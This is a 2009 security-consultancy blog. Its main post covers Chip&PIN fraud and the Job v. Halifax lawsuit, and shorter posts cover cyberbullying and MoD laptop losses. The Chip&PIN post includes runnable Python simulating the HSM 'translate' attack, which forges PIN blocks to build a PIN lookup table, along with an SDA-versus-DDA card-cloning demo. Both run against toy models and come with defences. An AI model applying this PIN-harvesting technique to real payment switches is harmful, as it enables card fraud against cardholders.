Protecting Your Data Is Our Business

Microexpert has a long track record of helping clients protect the confidentiality and integrity of their information systems. We can provide the following products and services:
  • Information Risk Assessment
  • Protective Monitoring (Mirkatz Network Defense Units)
  • Fraud Prevention and Detection
  • Insider Attack Prevention and Detection
  • Electronic Payment System Architects
  • Identity Management Architects
We are also specialists in the technology of cryptographic security objects such as smart cards, SIM cards and USB tokens and can advise on their use in Government, Financial and Commercial environments.

Tuesday, 28 April 2009

Phantom Withdrawals Halifax Nightmare

Hundreds of millions of bank account details have been captured over the last year. Now, for the first time in the UK, a man will challenge Chip&PIN security over a phantom withdrawal. A new report shows that the ongoing data-loss crisis is being driven by criminals using increasingly innovative and sneaky methods of attack.

Alain Job, a 40-year-old football coach, saw money disappearing from his account but maintains that he always had possession of his card and did not make the withdrawal. His original claim to the Financial Ombudsman Service (FOS), which mediates disputes between banks and customers, was unsuccessful back in 2007. Now Job has decided to sue over the phantom withdrawal, calling Chip&PIN security into question.

"Criminals have re-engineered their processes and developed new tools – such as memory scraping malware and have successfully executed complex attack strategies previously thought to be only theoretically possible and are actively cracking PIN encryption." revealed Verizon's 2009 Data Breach Investigations Report. The news is a result of its Underground Intelligence Unit's operations.

Personal Identification Numbers (PINs) are now a high-value target for cyber criminals. Criminals implant rogue software inside payment networks to harvest PINs by the million, and PIN and account data are often sold over the internet to the highest bidder.

One of the methods the report describes for collecting PINs is to exploit the Hardware Security Modules (HSMs) in the switches of the financial networks. The limiting factor is that the fraudster needs access to the HSM's command interface at one of these switches, which makes this an insider or compromised-host attack on a switch rather than an attack on the ATM.

Usually there is no direct link between the ATM and the cardholder's bank's verification system. The PIN is encrypted, together with part of the account number, into a PIN block, which hops along a chain of HSM-equipped switches on its way to the issuing bank. To ensure that no single party holds an end-to-end key, a different zone key is used on each link, so the PIN block is decrypted and re-encrypted at every switch. A switch can also reformat the block to suit different financial devices and network schemes.

An attack was documented by Omer Berkman of Tel Aviv University in a master's thesis entitled "The Unbearable Lightness of PIN Cracking". Berkman describes exploiting the 'Translate' function of the box. Translate is a standard operation of the HSM and part of the Financial PIN Processing API, a standard dating back some 30 years that covers all the functions for PIN verification, changing and reformatting.

The HSM hack

Prerequisites
  • Access to the HSM command interface at a switch
  • Non-EMV compliant operating ATM (magnetic stripe operation ATM)
The attacker first makes transactions with cards whose PINs he knows, so that he holds encrypted PIN blocks for known PINs. When such a block reaches the HSM he uses the translate function to convert it to a weaker block format built on a fixed account number, so that the output block depends only on the PIN. The flaw exploited is that the format mixes the account number into the PIN digits by XOR and the HSM trusts whatever account number the caller supplies, so by lying about the account number the attacker can make the HSM re-encrypt a PIN of his choosing. About 100 such transactions suffice to build a 10,000-entry look-up table covering every four-digit PIN. Any later PIN block passing through the switch is translated to the same fixed account number and looked up in the table, which yields the PIN.
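To make the translate abuse concrete, here is an added example written for this page; it is not code from Berkman's thesis, from the Cambridge team or from any HSM vendor. It models a switch HSM whose translate command decrypts a format 0 PIN block under one zone key, re-encodes it under a caller-supplied account number and re-encrypts it under another zone key, then shows the attacker turning 100 known-PIN blocks into a 10,000-entry table and looking up a victim's PIN. Assumptions: the class and key names (SwitchHSM, ZPK_ATM, ZPK_ISSUER) are illustrative, the 3DES of a real HSM is replaced by a small HMAC-based Feistel cipher so that the example runs on the Python standard library alone, and the card numbers and PINs are constructed.

```python
import hashlib
import hmac
import os

# Stand-in for the HSM's 3DES: a 4-round Feistel over 8-byte blocks with an
# HMAC-SHA256 round function, so the example needs only the standard library.
# The attack never touches the cipher; it abuses the translate API.
def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:4]

def encrypt(key, block):
    left, right = block[:4], block[4:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, rnd, right))
    return left + right

def decrypt(key, block):
    left, right = block[:4], block[4:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right

# ISO 9564 format 0: PIN field XOR PAN field. That XOR is the weakness used below.
def _pin_field(pin):   # control nibble 0, PIN length, PIN digits, F padding
    return bytes.fromhex(f"0{len(pin)}{pin}".ljust(16, "F"))

def _pan_field(pan):   # 0000 then the 12 rightmost PAN digits before the check digit
    return bytes.fromhex("0000" + pan[-13:-1])

def encode_iso0(pin, pan):
    return _xor(_pin_field(pin), _pan_field(pan))

def decode_iso0(block, pan):
    field = _xor(block, _pan_field(pan)).hex().upper()
    length = int(field[1], 16)
    pin = field[2:2 + length]
    if field[0] != "0" or not 4 <= length <= 12 or not pin.isdigit() \
            or field[2 + length:] != "F" * (14 - length):
        raise ValueError("malformed PIN block")
    return pin

class SwitchHSM:
    """Zone keys stay inside; callers see only ciphertext and the API."""
    def __init__(self):
        self.keys = {"ZPK_ATM": os.urandom(16), "ZPK_ISSUER": os.urandom(16)}

    def translate(self, block, key_in, pan_in, key_out, pan_out):
        # Decrypt, re-encode under the caller's output PAN, re-encrypt. The HSM
        # cannot tell whether pan_in is the PAN the block was really built with.
        pin = decode_iso0(decrypt(self.keys[key_in], block), pan_in)
        return encrypt(self.keys[key_out], encode_iso0(pin, pan_out))

def atm_pin_block(hsm, pin, pan):   # what the ATM sends to the switch
    return encrypt(hsm.keys["ZPK_ATM"], encode_iso0(pin, pan))

FIXED_PAN = "0" * 13   # output PAN the attacker fixes: output then depends on the PIN alone

def forge_block(hsm, block, pan, pin_known, pin_target):
    """Turn a block whose PIN the attacker knows into one the HSM reads as pin_target.
    Only PIN digits 3 and 4 overlap PAN digits inside the block, so the first two
    digits must already match; lying about those two PAN digits XORs the
    difference into the PIN, as long as the lie is still a decimal digit."""
    if pin_known[:2] != pin_target[:2]:
        return None
    claimed = list(pan)
    for k in (2, 3):
        i = len(pan) - 13 + (k - 2)            # PAN digit sitting under PIN digit k
        d = int(pan[i]) ^ int(pin_known[k]) ^ int(pin_target[k])
        if d > 9:
            return None
        claimed[i] = str(d)
    return hsm.translate(block, "ZPK_ATM", "".join(claimed), "ZPK_ISSUER", FIXED_PAN)

def build_table(hsm, known):
    """known: (block, pan, pin) triples from the attacker's own transactions."""
    table = {}
    for block, pan, pin in known:
        for suffix in range(100):
            forged = forge_block(hsm, block, pan, pin, pin[:2] + f"{suffix:02d}")
            if forged is not None:
                table[forged] = pin[:2] + f"{suffix:02d}"
    return table

def recover_pin(hsm, table, victim_block, victim_pan):
    return table.get(hsm.translate(victim_block, "ZPK_ATM", victim_pan,
                                   "ZPK_ISSUER", FIXED_PAN))

def demo():
    hsm = SwitchHSM()
    # constructed: 100 attacker transactions, one card per two-digit PIN prefix
    known = []
    for prefix in range(100):
        pan, pin = f"4{prefix:015d}", f"{prefix:02d}00"
        known.append((atm_pin_block(hsm, pin, pan), pan, pin))
    table = build_table(hsm, known)
    victim_pan, victim_pin = "5412751234567894", "7391"   # constructed victim
    observed = atm_pin_block(hsm, victim_pin, victim_pan)   # seen passing through the switch
    return len(table), recover_pin(hsm, table, observed, victim_pan)
```

demo() returns (10000, "7391"). Note what the fix is not: a stronger cipher would change nothing, because the attacker never attacks the cipher. The defences live in the API and its policy: refuse translate requests that change the PAN of a format 0 block, bind the PAN to the transaction rather than to the caller's parameters, and audit and rate-limit translate calls per host. The end-to-end "underlay" encryption suggested below aims at the same thing by taking the switch out of the trust path altogether.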

Credant Technologies, a vendor of "military grade" encryption, has suggested a solution: double up the encryption by additionally encrypting the PIN end-to-end between the ATM and the bank's verification system, underneath the existing hop-by-hop HSM encryption. Vice President Michael Callahan said: "There is nothing to stop banks adding military grade encryption as an underlay to their existing HSM-based network encryption system and so ensuring their cardholders are safe from this new type of hacking exploit".

The Liability Shift

Much of the public documentation of attacks on payment systems exists because of anger at the banks shifting the cost of fraud on to the cardholder following the introduction of Chip&PIN.

Before Chip and PIN, magnetic stripe cards and signatures were used for authorisation; if a fraudulent transaction took place, a cardholder could ask for the signature on the receipt to be examined against a sample of their own.

Now banks refuse liability: "If you act without reasonable care, you may be responsible for them". Banks can easily brand cardholders as not having taken enough care to keep their PIN secret, and in practice only CCTV footage can refute the claim that the customer was involved.

Academic institutions have been investigating Chip&PIN attacks. In the UK, Professor Ross Anderson of Cambridge University has been the most vocal and has captured the most media attention on the subject. Anderson and his team have been reverse engineering and documenting attacks on financial security systems for years. In the case of Chip&PIN they have even set up a dedicated website (www.chipandspin.co.uk) to highlight the raw deal cardholders are getting.

The Cambridge team's work includes:

(May 2005) - Chip and Spin;

The Fall-back Hack

Prerequisites
  • Non-EMV compliant operating ATM (magnetic stripe operation ATM)
  • Tampered PIN Pad
When a card whose chip is damaged, or which never had a chip, is presented at an ATM or POS terminal, the device falls back to magnetic stripe operation.

Magnetic stripe skimming is used to make a clone card, and a tampered PIN pad records the PIN. The fraudsters then use the stripe-only clone at an ATM that allows fall-back to magnetic stripe, or in a foreign country where EMV is not supported.

The Offline POS Hack

Prerequisites
  • Offline Point of Sale Terminal
The fraudster goes to a POS terminal that is not connected in real time to the bank's verification system. Using previously stolen account details he produces a crude smart card, programmed to accept whatever PIN he likes, since offline it is the card itself that verifies the PIN. The card's authenticity is not properly checked until the POS goes online, by which time the fraudster is long gone.

Modern DDA (Dynamic Data Authentication) cards have a challenge-response mechanism, signing a fresh terminal challenge with a private key held in the chip, so an offline POS can test the card's authenticity; the static signature of older SDA (Static Data Authentication) cards can simply be copied onto a clone.
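The difference between an offline check that a clone passes and one that it fails, as an added example (not code from this page or from the Cambridge papers it cites): a genuine card holds a private key and signs a fresh terminal challenge, while a clone built from data read off the genuine card can only replay what it saw, and will happily "verify" any PIN. Assumptions: EMV's separate issuer and ICC key pairs are collapsed into one toy RSA key pair built from two published Mersenne primes (insecure, but standard-library only); the class and method names and the card data are constructed for the example.

```python
import os
from hashlib import sha256

# Toy RSA from two published Mersenne primes: useless for real security, but it
# runs on the standard library and shows the mechanism. EMV uses separate issuer
# and ICC key pairs; here one pair stands in for both.
_P, _Q, _E = (1 << 521) - 1, (1 << 607) - 1, 65537
_N = _P * _Q
_D = pow(_E, -1, (_P - 1) * (_Q - 1))

def _sign(private_d, data):
    return pow(int.from_bytes(sha256(data).digest(), "big"), private_d, _N)

def _verify(signature, data):   # terminal side: public key only
    return pow(signature, _E, _N) == int.from_bytes(sha256(data).digest(), "big")

class GenuineCard:
    def __init__(self, pan, pin, static_data):
        self.pan, self._pin, self.static_data = pan, pin, static_data
        self.static_signature = _sign(_D, static_data)   # SDA record, readable by any terminal
        self._d = _D                                      # private key never leaves the chip

    def read_records(self):
        return {"pan": self.pan, "static_data": self.static_data,
                "static_signature": self.static_signature}

    def verify_pin(self, pin):                   # offline PIN check happens on the card
        return pin == self._pin

    def internal_authenticate(self, challenge):  # DDA: sign the terminal's challenge
        return _sign(self._d, self.static_data + challenge)

class ClonedCard:
    """Built from what a skimmer could read off the genuine card: no private key."""
    def __init__(self, records, replayed_signature):
        self.records, self.replayed = records, replayed_signature

    def read_records(self):
        return self.records

    def verify_pin(self, pin):                   # "programmed with any PIN he likes"
        return True

    def internal_authenticate(self, challenge):
        return self.replayed                     # can only replay a captured answer

def offline_sda_check(card):
    r = card.read_records()
    return _verify(r["static_signature"], r["static_data"])

def offline_dda_check(card, challenge=None):
    challenge = os.urandom(8) if challenge is None else challenge
    r = card.read_records()
    return _verify(card.internal_authenticate(challenge), r["static_data"] + challenge)

def demo():
    genuine = GenuineCard("5412751234567894", "7391", b"constructed static application data")
    old_challenge = b"\x11" * 8   # one DDA exchange the skimmer happened to record
    clone = ClonedCard(genuine.read_records(), genuine.internal_authenticate(old_challenge))
    return {
        "sda_genuine": offline_sda_check(genuine),
        "sda_clone": offline_sda_check(clone),               # static signature copies across
        "dda_genuine": offline_dda_check(genuine),
        "dda_clone": offline_dda_check(clone),               # fresh challenge, stale answer
        "dda_clone_replay": offline_dda_check(clone, old_challenge),
        "clone_accepts_any_pin": clone.verify_pin("0000") and not genuine.verify_pin("0000"),
    }
```

The SDA check passes for the clone because everything it relies on is readable from the genuine card; the DDA check fails for the clone because the terminal's challenge is fresh and the clone has no private key to answer it with. The only case where the clone's replay passes is if the terminal reuses a challenge, which is why the challenge must be random per transaction.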

(February 2006) - Phish and Chips;

The Smartcard Relay Hack

Prerequisites
  • Tampered PIN Pad/POS
  • A fake card with Bluetooth or similar
The victim pays for a small-value item at the tampered POS:

"The smartcard data stream would go maybe via GPRS to a PDA in the crook's pocket, then to his fake card, and the captured PIN read out via a headphone in his ear. You think you're paying for lunch, but in fact you're buying the crooks a diamond!"

(February 2009) - Optimised to Fail;

Exploiting Card Readers for Online Banking

Prerequisites
  • Hostage (the cardholder, with their card)
Card readers for online banking may be used to assist a mugging. Previously, muggers marched a victim to an ATM to make sure they had given up the right PIN. Now, with portable card readers, criminals carry a device that asks the chip itself to verify the PIN offline, and so tells them on the spot whether their victim is lying about it.

Many of the more practical attacks exist because many countries are not yet EMV compliant, and financial systems can be fooled into operating in a non-EMV fall-back mode.

Perhaps the solution would be to apply more pressure to speed up EMV migration and stop legacy payment methods.

One thing is for sure: criminals are using ever more sophisticated ways of committing fraud. Banks should be more open to the seemingly far-fetched hacks, especially as insiders are helping the fraudsters and older-style cards without the necessary anti-counterfeiting measures remain in circulation.

Alain Job will challenge Chip and PIN security in the UK in a lawsuit against Halifax. This will be the first UK case to question the strength of a bank's security measures. Job claims that £2,100 disappeared from his account, while Halifax maintains it has evidence that Job's real card was used at an ATM.

The hearing will be held at Nottingham County Court on 30th April; many are eagerly awaiting the outcome of the case and the conclusions to be drawn from the questioning of bank security.

Job v. Halifax plc (case number 7BQ00307) Trial Update

Halifax has refused to comment on the case, other than to maintain that it was Mr Job's own card that was used to withdraw the money, implying that either Mr Job tried to defraud the bank or he was grossly negligent in handling his card and PIN. Halifax also said that it would "vigorously defend" itself in court.

Because of the complexity of the case, the judge in the one-day trial said that it would take at least a month to deliver his verdict.

1st June 2009: There have been no further reports as yet on Alain Job v. Halifax plc; the judge in the one-day trial is due to deliver his verdict in the next few weeks.

6th June 2009: See "Halifax Ghostbust After Trial Closed"

Wednesday, 22 April 2009

From Playground to Internet

It emerged today that school children are being bullied not only in the school playground but on the internet as well.

Cyberbullying is becoming an increasingly worrying problem for teenagers worldwide, with the numbers seeking help rising as the bullies take to the net.

Cyberbullying is a form of bullying carried out through electronic media by a minor to torment, threaten, harass or otherwise target another minor. E-mail, chat rooms, discussion groups and instant messaging are among the main channels, but cyberbullying can also take place through mobile phones, text messages, pagers or belittlement on websites.

It was revealed today that nearly 10,000 children each week are seeking help to cope with cyberbullying. Backed by PM Gordon Brown, the charity Beatbullying has recently launched a website offering peer support and advice to children subjected to cyberbullying. The shocking results from the site, http://www.cybermentors.org.uk/, show the true scale of the cyberbullying problem for the first time.

Spokeswoman Emma Jane Cross said: "We are experiencing an overwhelming response to the launch of our peer mentoring social networking site - these are serious alarm bells we must act on." Cross went on to say: "bullying in any form is unacceptable, but sadly it is an issue that has only been propagated by digital innovations."

More than 600 teenagers have now been trained as CyberMentors to help their fellow pupils online. In the website's first breakdown of feedback, the charity found that 52% of users said they had not had their problems listened to by anyone before, and 64% felt better after using the site's mentoring system.

Beatbullying has revealed that a third of children are being cyberbullied, most of the victims being in the 11-18 age range, with girls four times more likely to be bullied than boys.

Tuesday, 14 April 2009

MoD Admit SAS Data Disappears

The Ministry of Defence announced yesterday that details of SAS soldiers have gone missing after an unencrypted laptop disappeared during a recent exercise in Britain.

The laptop was being used by the Signals Regiment attached to the elite force based in Hereford. The loss was discovered by military chiefs during a routine kit audit, which also established that the machine held details of top-secret anti-terror training exercises; it is believed to hold the names of the personnel taking part.

Sources have revealed that the computer holds sensitive information about the military and counter-terrorism manoeuvres within the Signals Regiment. In a statement, the source, who cannot be named for reasons of security, has added that "the soldier in charge of the computer is panicking. It is very embarrassing because keeping tabs on kit is the most important part of working with the SAS."

The Ministry of Defence has insisted that the missing laptop does not hold information about operations or details of weapons. An MoD spokesman announced the opening of an inquiry into the possible theft of the computer, adding: "We can confirm that we are investigating the possible loss of a hard drive, containing only unclassified information which was being used on a training exercise." The spokesman then added, "We are carrying out our inquiries into what happened."

After last year's string of lost laptops, it is clear that Parliament and the Ministry of Defence need either better enforcement or simply to follow through on the data security measures they have been promising for the last four years. While promising to strengthen security, the MoD says its information is protected and encrypted; yet it has come to light that the Ministry loses around 15 laptops per month to loss or theft.

At the beginning of October 2008 the UK Ministry of Defence acknowledged that three hard drives containing personal data of over 50,000 current and former Royal Air Force personnel had been stolen on 17th September from a "double-secured" area of the Service Personnel and Veterans Agency's offices at Innsworth Station, Gloucestershire. These too are believed to have been unencrypted, the MoD having relied on the supposedly secure facility instead.

Another investigation was launched a week later, after the MoD acknowledged a further lost hard drive, this time by the contractor EDS (now a Hewlett-Packard company), which provides IT services to the Department for Work and Pensions (DWP), the Ministry of Justice and the MoD. The hard drive lost in this instance held data on 100,000 members of the British armed forces, including next-of-kin details, passport and National Insurance numbers, driving licence and bank details, and NHS numbers. It also held details of 600,000 potential recruits: the applicants' names, addresses, dates of birth and telephone numbers. The MoD's account of the loss revealed worrying uncertainty over whether the data had been encrypted.

On 14th October the Ministry of Defence admitted that the scale of the loss was far greater: the lost drive's data covered not "just" 600,000 potential recruits but 1.7 million of them. The MoD also worryingly confessed that it was fairly certain that, like the other losses over the last six months, this data was not encrypted.

Although the MoD has insisted that the latest data loss did not include details of operations or weapons within the SAS, Shadow Defence Secretary Liam Fox said that the loss was "deeply concerning". He expressed this in a further statement: "Any loss of data of this nature is deeply concerning, especially if there are security implications." The Shadow Defence Secretary went on to say, "We will want to know the full picture from the Ministry of Defence as soon as possible to ensure that neither civilians nor military personnel are at risk."